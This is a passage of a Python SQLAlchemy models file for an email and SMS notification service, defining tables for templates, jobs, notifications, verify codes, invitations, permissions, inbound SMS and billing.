db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(db.DateTime, onupdate=datetime.datetime.utcnow)
content = db.Column(db.Text, nullable=False)
archived = db.Column(db.Boolean, nullable=False, default=False)
hidden = db.Column(db.Boolean, nullable=False, default=False)
subject = db.Column(db.Text)
@declared_attr
def service_id(cls):
return db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
@declared_attr
def created_by_id(cls):
return db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
@declared_attr
def created_by(cls):
return db.relationship("User")
@declared_attr
def process_type(cls):
return db.Column(
db.String(255),
db.ForeignKey("template_process_type.name"),
index=True,
nullable=False,
default=NORMAL,
)
redact_personalisation = association_proxy(
"template_redacted", "redact_personalisation"
)
# TODO: possibly unnecessary after removing letters
@property
def reply_to(self):
return None
@reply_to.setter
def reply_to(self, value):
if value is None:
pass
else:
raise ValueError(
"Unable to set sender for {} template".format(self.template_type)
)
def get_reply_to_text(self):
if self.template_type == EMAIL_TYPE:
return self.service.get_default_reply_to_email_address()
elif self.template_type == SMS_TYPE:
return try_validate_and_format_phone_number(
self.service.get_default_sms_sender()
)
else:
return None
def _as_utils_template(self):
if self.template_type == EMAIL_TYPE:
return PlainTextEmailTemplate(self.__dict__)
if self.template_type == SMS_TYPE:
return SMSMessageTemplate(self.__dict__)
def _as_utils_template_with_personalisation(self, values):
template = self._as_utils_template()
template.values = values
return template
def serialize_for_v2(self):
serialized = {
"id": str(self.id),
"type": self.template_type,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
"created_by": self.created_by.email_address,
"version": self.version,
"body": self.content,
"subject": self.subject if self.template_type == EMAIL_TYPE else None,
"name": self.name,
"personalisation": {
key: {
"required": True,
}
for key in self._as_utils_template().placeholders
},
}
return serialized
class Template(TemplateBase):
__tablename__ = "templates"
service = db.relationship("Service", backref="templates")
version = db.Column(db.Integer, default=0, nullable=False)
folder = db.relationship(
"TemplateFolder",
secondary=template_folder_map,
uselist=False,
# eagerly load the folder whenever the template object is fetched
lazy="joined",
backref=db.backref("templates"),
)
def get_link(self):
# TODO: use "/v2/" route once available
return url_for(
"template.get_template_by_id_and_service_id",
service_id=self.service_id,
template_id=self.id,
_external=True,
)
@classmethod
def from_json(cls, data, folder):
"""
Assumption: data has been validated appropriately.
Returns a Template object based on the provided data.
"""
fields = data.copy()
fields["created_by_id"] = fields.pop("created_by")
fields["service_id"] = fields.pop("service")
fields["folder"] = folder
return cls(**fields)
class TemplateRedacted(db.Model):
__tablename__ = "template_redacted"
template_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("templates.id"),
primary_key=True,
nullable=False,
)
redact_personalisation = db.Column(db.Boolean, nullable=False, default=False)
updated_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False, index=True
)
updated_by = db.relationship("User")
# uselist=False as this is a one-to-one relationship
template = db.relationship(
"Template",
uselist=False,
backref=db.backref("template_redacted", uselist=False),
)
class TemplateHistory(TemplateBase):
__tablename__ = "templates_history"
service = db.relationship("Service")
version = db.Column(db.Integer, primary_key=True, nullable=False)
@declared_attr
def template_redacted(cls):
return db.relationship(
"TemplateRedacted",
foreign_keys=[cls.id],
primaryjoin="TemplateRedacted.template_id == TemplateHistory.id",
)
def get_link(self):
return url_for(
"v2_template.get_template_by_id",
template_id=self.id,
version=self.version,
_external=True,
)
SNS_PROVIDER = "sns"
SES_PROVIDER = "ses"
SMS_PROVIDERS = [SNS_PROVIDER]
EMAIL_PROVIDERS = [SES_PROVIDER]
PROVIDERS = SMS_PROVIDERS + EMAIL_PROVIDERS
notification_types = db.Enum(*NOTIFICATION_TYPES, name="notification_type")
class ProviderDetails(db.Model):
__tablename__ = "provider_details"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
display_name = db.Column(db.String, nullable=False)
identifier = db.Column(db.String, nullable=False)
priority = db.Column(db.Integer, nullable=False)
notification_type = db.Column(notification_types, nullable=False)
active = db.Column(db.Boolean, default=False, nullable=False)
version = db.Column(db.Integer, default=1, nullable=False)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
created_by = db.relationship("User")
supports_international = db.Column(db.Boolean, nullable=False, default=False)
class ProviderDetailsHistory(db.Model, HistoryModel):
__tablename__ = "provider_details_history"
id = db.Column(UUID(as_uuid=True), primary_key=True, nullable=False)
display_name = db.Column(db.String, nullable=False)
identifier = db.Column(db.String, nullable=False)
priority = db.Column(db.Integer, nullable=False)
notification_type = db.Column(notification_types, nullable=False)
active = db.Column(db.Boolean, nullable=False)
version = db.Column(db.Integer, primary_key=True, nullable=False)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
created_by = db.relationship("User")
supports_international = db.Column(db.Boolean, nullable=False, default=False)
JOB_STATUS_PENDING = "pending"
JOB_STATUS_IN_PROGRESS = "in progress"
JOB_STATUS_FINISHED = "finished"
JOB_STATUS_SENDING_LIMITS_EXCEEDED = "sending limits exceeded"
JOB_STATUS_SCHEDULED = "scheduled"
JOB_STATUS_CANCELLED = "cancelled"
JOB_STATUS_READY_TO_SEND = "ready to send"
JOB_STATUS_SENT_TO_DVLA = "sent to dvla"
JOB_STATUS_ERROR = "error"
JOB_STATUS_TYPES = [
JOB_STATUS_PENDING,
JOB_STATUS_IN_PROGRESS,
JOB_STATUS_FINISHED,
JOB_STATUS_SENDING_LIMITS_EXCEEDED,
JOB_STATUS_SCHEDULED,
JOB_STATUS_CANCELLED,
JOB_STATUS_READY_TO_SEND,
JOB_STATUS_SENT_TO_DVLA,
JOB_STATUS_ERROR,
]
class JobStatus(db.Model):
__tablename__ = "job_status"
name = db.Column(db.String(255), primary_key=True)
class Job(db.Model):
__tablename__ = "jobs"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
original_file_name = db.Column(db.String, nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
unique=False,
nullable=False,
)
service = db.relationship("Service", backref=db.backref("jobs", lazy="dynamic"))
template_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("templates.id"), index=True, unique=False
)
template = db.relationship("Template", backref=db.backref("jobs", lazy="dynamic"))
template_version = db.Column(db.Integer, nullable=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
notification_count = db.Column(db.Integer, nullable=False)
notifications_sent = db.Column(db.Integer, nullable=False, default=0)
notifications_delivered = db.Column(db.Integer, nullable=False, default=0)
notifications_failed = db.Column(db.Integer, nullable=False, default=0)
processing_started = db.Column(
db.DateTime, index=False, unique=False, nullable=True
)
processing_finished = db.Column(
db.DateTime, index=False, unique=False, nullable=True
)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=True
)
scheduled_for = db.Column(db.DateTime, index=True, unique=False, nullable=True)
job_status = db.Column(
db.String(255),
db.ForeignKey("job_status.name"),
index=True,
nullable=False,
default="pending",
)
archived = db.Column(db.Boolean, nullable=False, default=False)
VERIFY_CODE_TYPES = [EMAIL_TYPE, SMS_TYPE]
class VerifyCode(db.Model):
__tablename__ = "verify_codes"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
user = db.relationship("User", backref=db.backref("verify_codes", lazy="dynamic"))
_code = db.Column(db.String, nullable=False)
code_type = db.Column(
db.Enum(*VERIFY_CODE_TYPES, name="verify_code_types"),
index=False,
unique=False,
nullable=False,
)
expiry_datetime = db.Column(db.DateTime, nullable=False)
code_used = db.Column(db.Boolean, default=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
@property
def code(self):
raise AttributeError("Code not readable")
@code.setter
def code(self, cde):
self._code = hashpw(cde)
def check_code(self, cde):
return check_hash(cde, self._code)
NOTIFICATION_CANCELLED = "cancelled"
NOTIFICATION_CREATED = "created"
NOTIFICATION_SENDING = "sending"
NOTIFICATION_SENT = "sent"
NOTIFICATION_DELIVERED = "delivered"
NOTIFICATION_PENDING = "pending"
NOTIFICATION_FAILED = "failed"
NOTIFICATION_TECHNICAL_FAILURE = "technical-failure"
NOTIFICATION_TEMPORARY_FAILURE = "temporary-failure"
NOTIFICATION_PERMANENT_FAILURE = "permanent-failure"
NOTIFICATION_PENDING_VIRUS_CHECK = "pending-virus-check"
NOTIFICATION_VALIDATION_FAILED = "validation-failed"
NOTIFICATION_VIRUS_SCAN_FAILED = "virus-scan-failed"
NOTIFICATION_STATUS_TYPES_FAILED = [
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_VALIDATION_FAILED,
NOTIFICATION_VIRUS_SCAN_FAILED,
]
NOTIFICATION_STATUS_TYPES_COMPLETED = [
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_FAILED,
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_CANCELLED,
]
NOTIFICATION_STATUS_SUCCESS = [NOTIFICATION_SENT, NOTIFICATION_DELIVERED]
NOTIFICATION_STATUS_TYPES_BILLABLE = [
NOTIFICATION_SENDING,
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_FAILED,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
NOTIFICATION_STATUS_TYPES_BILLABLE_SMS = [
NOTIFICATION_SENDING,
NOTIFICATION_SENT, # internationally
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
# we don't really have a concept of billable emails - however the ft billing table only includes emails that we have
# actually sent.
NOTIFICATION_STATUS_TYPES_SENT_EMAILS = [
NOTIFICATION_SENDING,
NOTIFICATION_DELIVERED,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
]
NOTIFICATION_STATUS_TYPES = [
NOTIFICATION_CANCELLED,
NOTIFICATION_CREATED,
NOTIFICATION_SENDING,
NOTIFICATION_SENT,
NOTIFICATION_DELIVERED,
NOTIFICATION_PENDING,
NOTIFICATION_FAILED,
NOTIFICATION_TECHNICAL_FAILURE,
NOTIFICATION_TEMPORARY_FAILURE,
NOTIFICATION_PERMANENT_FAILURE,
NOTIFICATION_PENDING_VIRUS_CHECK,
NOTIFICATION_VALIDATION_FAILED,
NOTIFICATION_VIRUS_SCAN_FAILED,
]
NOTIFICATION_STATUS_TYPES_NON_BILLABLE = list(
set(NOTIFICATION_STATUS_TYPES) - set(NOTIFICATION_STATUS_TYPES_BILLABLE)
)
NOTIFICATION_STATUS_TYPES_ENUM = db.Enum(
*NOTIFICATION_STATUS_TYPES, name="notify_status_type"
)
class NotificationStatusTypes(db.Model):
__tablename__ = "notification_status_types"
name = db.Column(db.String(), primary_key=True)
class NotificationAllTimeView(db.Model):
"""
WARNING: this view is a union of rows in "notifications" and
"notification_history". Any query on this view will query both
tables and therefore rely on *both* sets of indices.
"""
__tablename__ = "notifications_all_time_view"
# Tell alembic not to create this as a table. We have a migration where we manually set this up as a view.
# This is custom logic we apply - not built-in logic. See `migrations/env.py`
__table_args__ = {"info": {"managed_by_alembic": False}}
id = db.Column(UUID(as_uuid=True), primary_key=True)
job_id = db.Column(UUID(as_uuid=True))
job_row_number = db.Column(db.Integer)
service_id = db.Column(UUID(as_uuid=True))
template_id = db.Column(UUID(as_uuid=True))
template_version = db.Column(db.Integer)
api_key_id = db.Column(UUID(as_uuid=True))
key_type = db.Column(db.String)
billable_units = db.Column(db.Integer)
notification_type = db.Column(notification_types)
created_at = db.Column(db.DateTime)
sent_at = db.Column(db.DateTime)
sent_by = db.Column(db.String)
updated_at = db.Column(db.DateTime)
status = db.Column("notification_status", db.Text)
reference = db.Column(db.String)
client_reference = db.Column(db.String)
international = db.Column(db.Boolean)
phone_prefix = db.Column(db.String)
rate_multiplier = db.Column(db.Numeric(asdecimal=False))
created_by_id = db.Column(UUID(as_uuid=True))
document_download_count = db.Column(db.Integer)
class Notification(db.Model):
__tablename__ = "notifications"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
to = db.Column(db.String, nullable=False)
normalised_to = db.Column(db.String, nullable=True)
job_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("jobs.id"), index=True, unique=False
)
job = db.relationship("Job", backref=db.backref("notifications", lazy="dynamic"))
job_row_number = db.Column(db.Integer, nullable=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), unique=False
)
service = db.relationship("Service")
template_id = db.Column(UUID(as_uuid=True), index=True, unique=False)
template_version = db.Column(db.Integer, nullable=False)
template = db.relationship("TemplateHistory")
api_key_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("api_keys.id"), unique=False
)
api_key = db.relationship("ApiKey")
key_type = db.Column(
db.String, db.ForeignKey("key_types.name"), unique=False, nullable=False
)
billable_units = db.Column(db.Integer, nullable=False, default=0)
notification_type = db.Column(notification_types, nullable=False)
created_at = db.Column(db.DateTime, index=True, unique=False, nullable=False)
sent_at = db.Column(db.DateTime, index=False, unique=False, nullable=True)
sent_by = db.Column(db.String, nullable=True)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
status = db.Column(
"notification_status",
db.Text,
db.ForeignKey("notification_status_types.name"),
nullable=True,
default="created",
key="status", # http://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column
)
reference = db.Column(db.String, nullable=True, index=True)
client_reference = db.Column(db.String, index=True, nullable=True)
_personalisation = db.Column(db.String, nullable=True)
international = db.Column(db.Boolean, nullable=False, default=False)
phone_prefix = db.Column(db.String, nullable=True)
rate_multiplier = db.Column(db.Numeric(asdecimal=False), nullable=True)
created_by = db.relationship("User")
created_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=True
)
reply_to_text = db.Column(db.String, nullable=True)
document_download_count = db.Column(db.Integer, nullable=True)
provider_response = db.Column(db.Text, nullable=True)
# queue_name = db.Column(db.Text, nullable=True)
__table_args__ = (
db.ForeignKeyConstraint(
["template_id", "template_version"],
["templates_history.id", "templates_history.version"],
),
UniqueConstraint(
"job_id", "job_row_number", name="uq_notifications_job_row_number"
),
Index(
"ix_notifications_notification_type_composite",
"notification_type",
"status",
"created_at",
),
Index("ix_notifications_service_created_at", "service_id", "created_at"),
Index(
"ix_notifications_service_id_composite",
"service_id",
"notification_type",
"status",
"created_at",
),
)
@property
def personalisation(self):
if self._personalisation:
try:
return encryption.decrypt(self._personalisation)
except EncryptionError:
current_app.logger.error(
"Error decrypting notification.personalisation, returning empty dict"
)
return {}
@personalisation.setter
def personalisation(self, personalisation):
self._personalisation = encryption.encrypt(personalisation or {})
def completed_at(self):
if self.status in NOTIFICATION_STATUS_TYPES_COMPLETED:
return self.updated_at.strftime(DATETIME_FORMAT)
return None
@staticmethod
def substitute_status(status_or_statuses):
"""
static function that takes a status or list of statuses and substitutes our new failure types if it finds
the deprecated one
> IN
'failed'
< OUT
['technical-failure', 'temporary-failure', 'permanent-failure']
-
> IN
['failed', 'created', 'accepted']
< OUT
['technical-failure', 'temporary-failure', 'permanent-failure', 'created', 'sending']
-
> IN
'delivered'
< OUT
['received']
:param status_or_statuses: a single status or list of statuses
:return: a single status or list with the current failure statuses substituted for 'failure'
"""
def _substitute_status_str(_status):
return (
NOTIFICATION_STATUS_TYPES_FAILED
if _status == NOTIFICATION_FAILED
else [_status]
)
def _substitute_status_seq(_statuses):
return list(
set(
itertools.chain.from_iterable(
_substitute_status_str(status) for status in _statuses
)
)
)
if isinstance(status_or_statuses, str):
return _substitute_status_str(status_or_statuses)
return _substitute_status_seq(status_or_statuses)
@property
def content(self):
return self.template._as_utils_template_with_personalisation(
self.personalisation
).content_with_placeholders_filled_in
@property
def subject(self):
template_object = self.template._as_utils_template_with_personalisation(
self.personalisation
)
return getattr(template_object, "subject", None)
@property
def formatted_status(self):
return {
"email": {
"failed": "Failed",
"technical-failure": "Technical failure",
"temporary-failure": "Inbox not accepting messages right now",
"permanent-failure": "Email address doesn’t exist",
"delivered": "Delivered",
"sending": "Sending",
"created": "Sending",
"sent": "Delivered",
},
"sms": {
"failed": "Failed",
"technical-failure": "Technical failure",
"temporary-failure": "Unable to find carrier response -- still looking",
"permanent-failure": "Unable to find carrier response.",
"delivered": "Delivered",
"sending": "Sending",
"created": "Sending",
"sent": "Sent internationally",
},
}[self.template.template_type].get(self.status, self.status)
def get_created_by_name(self):
if self.created_by:
return self.created_by.name
else:
return None
def get_created_by_email_address(self):
if self.created_by:
return self.created_by.email_address
else:
return None
def serialize_for_csv(self):
serialized = {
"row_number": ""
if self.job_row_number is None
else self.job_row_number + 1,
"recipient": self.to,
"client_reference": self.client_reference or "",
"template_name": self.template.name,
"template_type": self.template.template_type,
"job_name": self.job.original_file_name if self.job else "",
"status": self.formatted_status,
"created_at": self.created_at.strftime("%Y-%m-%d %H:%M:%S"),
"created_by_name": self.get_created_by_name(),
"created_by_email_address": self.get_created_by_email_address(),
}
return serialized
def serialize(self):
template_dict = {
"version": self.template.version,
"id": self.template.id,
"uri": self.template.get_link(),
}
serialized = {
"id": self.id,
"reference": self.client_reference,
"email_address": self.to if self.notification_type == EMAIL_TYPE else None,
"phone_number": self.to if self.notification_type == SMS_TYPE else None,
"line_1": None,
"line_2": None,
"line_3": None,
"line_4": None,
"line_5": None,
"line_6": None,
"postcode": None,
"type": self.notification_type,
"status": self.status,
"provider_response": self.provider_response,
"template": template_dict,
"body": self.content,
"subject": self.subject,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"created_by_name": self.get_created_by_name(),
"sent_at": get_dt_string_or_none(self.sent_at),
"completed_at": self.completed_at(),
"scheduled_for": None,
}
return serialized
class NotificationHistory(db.Model, HistoryModel):
__tablename__ = "notification_history"
id = db.Column(UUID(as_uuid=True), primary_key=True)
job_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("jobs.id"), index=True, unique=False
)
job = db.relationship("Job")
job_row_number = db.Column(db.Integer, nullable=True)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), unique=False
)
service = db.relationship("Service")
template_id = db.Column(UUID(as_uuid=True), unique=False)
template_version = db.Column(db.Integer, nullable=False)
api_key_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("api_keys.id"), unique=False
)
api_key = db.relationship("ApiKey")
key_type = db.Column(
db.String, db.ForeignKey("key_types.name"), unique=False, nullable=False
)
billable_units = db.Column(db.Integer, nullable=False, default=0)
notification_type = db.Column(notification_types, nullable=False)
created_at = db.Column(db.DateTime, unique=False, nullable=False)
sent_at = db.Column(db.DateTime, index=False, unique=False, nullable=True)
sent_by = db.Column(db.String, nullable=True)
updated_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=True,
onupdate=datetime.datetime.utcnow,
)
status = db.Column(
"notification_status",
db.Text,
db.ForeignKey("notification_status_types.name"),
nullable=True,
default="created",
key="status", # http://docs.sqlalchemy.org/en/latest/core/metadata.html#sqlalchemy.schema.Column
)
reference = db.Column(db.String, nullable=True, index=True)
client_reference = db.Column(db.String, nullable=True)
international = db.Column(db.Boolean, nullable=True, default=False)
phone_prefix = db.Column(db.String, nullable=True)
rate_multiplier = db.Column(db.Numeric(asdecimal=False), nullable=True)
created_by_id = db.Column(UUID(as_uuid=True), nullable=True)
document_download_count = db.Column(db.Integer, nullable=True)
__table_args__ = (
db.ForeignKeyConstraint(
["template_id", "template_version"],
["templates_history.id", "templates_history.version"],
),
Index(
"ix_notification_history_service_id_composite",
"service_id",
"key_type",
"notification_type",
"created_at",
),
)
@classmethod
def from_original(cls, notification):
history = super().from_original(notification)
history.status = notification.status
return history
def update_from_original(self, original):
super().update_from_original(original)
self.status = original.status
INVITE_PENDING = "pending"
INVITE_ACCEPTED = "accepted"
INVITE_CANCELLED = "cancelled"
INVITED_USER_STATUS_TYPES = [INVITE_PENDING, INVITE_ACCEPTED, INVITE_CANCELLED]
class InviteStatusType(db.Model):
__tablename__ = "invite_status_type"
name = db.Column(db.String, primary_key=True)
class InvitedUser(db.Model):
__tablename__ = "invited_users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email_address = db.Column(db.String(255), nullable=False)
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
from_user = db.relationship("User")
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, unique=False
)
service = db.relationship("Service")
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
status = db.Column(
db.Enum(*INVITED_USER_STATUS_TYPES, name="invited_users_status_types"),
nullable=False,
default=INVITE_PENDING,
)
permissions = db.Column(db.String, nullable=False)
auth_type = db.Column(
db.String,
db.ForeignKey("auth_type.name"),
index=True,
nullable=False,
default=SMS_AUTH_TYPE,
)
folder_permissions = db.Column(JSONB(none_as_null=True), nullable=False, default=[])
# would like to have used properties for this but haven't found a way to make them
# play nice with marshmallow yet
def get_permissions(self):
return self.permissions.split(",")
class InvitedOrganizationUser(db.Model):
__tablename__ = "invited_organization_users"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
email_address = db.Column(db.String(255), nullable=False)
invited_by_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False
)
invited_by = db.relationship("User")
organization_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("organization.id"), nullable=False
)
organization = db.relationship("Organization")
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
status = db.Column(
db.String,
db.ForeignKey("invite_status_type.name"),
nullable=False,
default=INVITE_PENDING,
)
def serialize(self):
return {
"id": str(self.id),
"email_address": self.email_address,
"invited_by": str(self.invited_by_id),
"organization": str(self.organization_id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"status": self.status,
}
# Service Permissions
MANAGE_USERS = "manage_users"
MANAGE_TEMPLATES = "manage_templates"
MANAGE_SETTINGS = "manage_settings"
SEND_TEXTS = "send_texts"
SEND_EMAILS = "send_emails"
MANAGE_API_KEYS = "manage_api_keys"
PLATFORM_ADMIN = "platform_admin"
VIEW_ACTIVITY = "view_activity"
# List of permissions
PERMISSION_LIST = [
MANAGE_USERS,
MANAGE_TEMPLATES,
MANAGE_SETTINGS,
SEND_TEXTS,
SEND_EMAILS,
MANAGE_API_KEYS,
PLATFORM_ADMIN,
VIEW_ACTIVITY,
]
class Permission(db.Model):
__tablename__ = "permissions"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
# Service id is optional, if the service is omitted we will assume the permission is not service specific.
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
index=True,
unique=False,
nullable=True,
)
service = db.relationship("Service")
user_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("users.id"), index=True, nullable=False
)
user = db.relationship("User")
permission = db.Column(
db.Enum(*PERMISSION_LIST, name="permission_types"),
index=False,
unique=False,
nullable=False,
)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
__table_args__ = (
UniqueConstraint(
"service_id", "user_id", "permission", name="uix_service_user_permission"
),
)
class Event(db.Model):
__tablename__ = "events"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
event_type = db.Column(db.String(255), nullable=False)
created_at = db.Column(
db.DateTime,
index=False,
unique=False,
nullable=False,
default=datetime.datetime.utcnow,
)
data = db.Column(JSON, nullable=False)
class Rate(db.Model):
__tablename__ = "rates"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
valid_from = db.Column(db.DateTime, nullable=False)
rate = db.Column(db.Float(asdecimal=False), nullable=False)
notification_type = db.Column(notification_types, index=True, nullable=False)
def __str__(self):
the_string = "{}".format(self.rate)
the_string += " {}".format(self.notification_type)
the_string += " {}".format(self.valid_from)
return the_string
class InboundSms(db.Model):
__tablename__ = "inbound_sms"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, nullable=False
)
service = db.relationship("Service", backref="inbound_sms")
notify_number = db.Column(
db.String, nullable=False
) # the service's number, that the msg was sent to
user_number = db.Column(
db.String, nullable=False, index=True
) # the end user's number, that the msg was sent from
provider_date = db.Column(db.DateTime)
provider_reference = db.Column(db.String)
provider = db.Column(db.String, nullable=False)
_content = db.Column("content", db.String, nullable=False)
@property
def content(self):
return encryption.decrypt(self._content)
@content.setter
def content(self, content):
self._content = encryption.encrypt(content)
def serialize(self):
return {
"id": str(self.id),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"service_id": str(self.service_id),
"notify_number": self.notify_number,
"user_number": self.user_number,
"content": self.content,
}
class InboundSmsHistory(db.Model, HistoryModel):
__tablename__ = "inbound_sms_history"
id = db.Column(UUID(as_uuid=True), primary_key=True)
created_at = db.Column(db.DateTime, index=True, unique=False, nullable=False)
service_id = db.Column(
UUID(as_uuid=True), db.ForeignKey("services.id"), index=True, unique=False
)
service = db.relationship("Service")
notify_number = db.Column(db.String, nullable=False)
provider_date = db.Column(db.DateTime)
provider_reference = db.Column(db.String)
provider = db.Column(db.String, nullable=False)
class ServiceEmailReplyTo(db.Model):
__tablename__ = "service_email_reply_to"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(Service, backref=db.backref("reply_to_email_addresses"))
email_address = db.Column(db.Text, nullable=False, index=False, unique=False)
is_default = db.Column(db.Boolean, nullable=False, default=True)
archived = db.Column(db.Boolean, nullable=False, default=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"email_address": self.email_address,
"is_default": self.is_default,
"archived": self.archived,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class AuthType(db.Model):
__tablename__ = "auth_type"
name = db.Column(db.String, primary_key=True)
class FactBilling(db.Model):
__tablename__ = "ft_billing"
local_date = db.Column(db.Date, nullable=False, primary_key=True, index=True)
template_id = db.Column(
UUID(as_uuid=True), nullable=False, primary_key=True, index=True
)
service_id = db.Column(
UUID(as_uuid=True), nullable=False, primary_key=True, index=True
)
notification_type = db.Column(db.Text, nullable=False, primary_key=True)
provider = db.Column(db.Text, nullable=False, primary_key=True)
rate_multiplier = db.Column(db.Integer(), nullable=False, primary_key=True)
international = db.Column(db.Boolean, nullable=False, primary_key=True)
rate = db.Column(db.Numeric(), nullable=False, primary_key=True)
billable_units = db.Column(db.Integer(), nullable=True)
notifications_sent = db.Column(db.Integer(), nullable=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class FactNotificationStatus(db.Model):
__tablename__ = "ft_notification_status"
local_date = db.Column(db.Date, index=True, primary_key=True, nullable=False)
template_id = db.Column(
UUID(as_uuid=True), primary_key=True, index=True, nullable=False
)
service_id = db.Column(
UUID(as_uuid=True),
primary_key=True,
index=True,
nullable=False,
)
job_id = db.Column(UUID(as_uuid=True), primary_key=True, index=True, nullable=False)
notification_type = db.Column(db.Text, primary_key=True, nullable=False)
key_type = db.Column(db.Text, primary_key=True, nullable=False)
notification_status = db.Column(db.Text, primary_key=True, nullable=False)
notification_count = db.Column(db.Integer(), nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class FactProcessingTime(db.Model):
__tablename__ = "ft_processing_time"
local_date = db.Column(db.Date, index=True, primary_key=True, nullable=False)
messages_total = db.Column(db.Integer(), nullable=False)
messages_within_10_secs = db.Column(db.Integer(), nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
class Complaint(db.Model):
__tablename__ = "complaints"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
notification_id = db.Column(UUID(as_uuid=True), index=True, nullable=False)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(Service, backref=db.backref("complaints"))
ses_feedback_id = db.Column(db.Text, nullable=True)
complaint_type = db.Column(db.Text, nullable=True)
